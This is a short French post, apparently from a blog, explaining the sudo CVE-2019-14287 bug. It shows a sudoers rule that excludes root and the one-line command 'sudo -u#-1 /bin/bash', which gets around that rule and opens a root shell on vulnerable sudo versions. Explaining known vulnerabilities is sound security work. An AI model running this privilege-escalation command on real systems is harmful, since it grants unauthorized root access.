exploit sudo CVE-2019-14287

le fichier sudoers ressemble à ceci

myhost r0cker (ALL, !root) /bin/bash

normalement, avec ces réglages r0cker peut exécuter /bin/bash comme n’importe lequel usager excepté root. seul qu’il y a un bug

si sudo est vulnérable, alors

sudo -u#-1 /bin/bash

Leave a Reply